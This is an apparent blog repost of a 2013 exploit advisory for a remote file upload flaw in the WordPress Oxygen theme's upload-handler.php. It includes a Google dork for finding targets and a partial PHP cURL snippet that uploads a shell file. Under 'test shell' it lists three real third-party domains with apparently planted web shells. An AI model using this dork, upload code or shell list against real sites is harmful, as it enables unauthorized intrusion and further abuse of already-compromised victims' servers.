Support By :


http://vyzewitch.blogspot.com/

http://vyzewitch.blogspot.com/

WordPress Oxygen-Theme Themes Remote File Upload Vulnerability

##############################################################################
# Exploit Title: WordPress oxygen-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/oxygen/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/oxygen-theme/"
# Tested on : Windows/Linux
##############################################################################
 
# Exploit
 
 
$uploadfile="upload.php";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
 
 
_________________________________
 
All http://www.mavi1.org members
 
 
---
test shell
 
http://www.potbot.de/wp-content/uploads/2013/11/ttt.php
http://klimatrol.com/wp-content/uploads/2013/11/ttt.php
http://toldos3d.com/wp-content/uploads/2013/11/ttt.php

Penulis : Ferry PG ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel WordPress Oxygen-Theme Themes Remote File Upload Vulnerability ini dipublish oleh Ferry PG pada hari 25 Nov 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan WordPress Oxygen-Theme Themes Remote File Upload Vulnerability
 

0 komentar: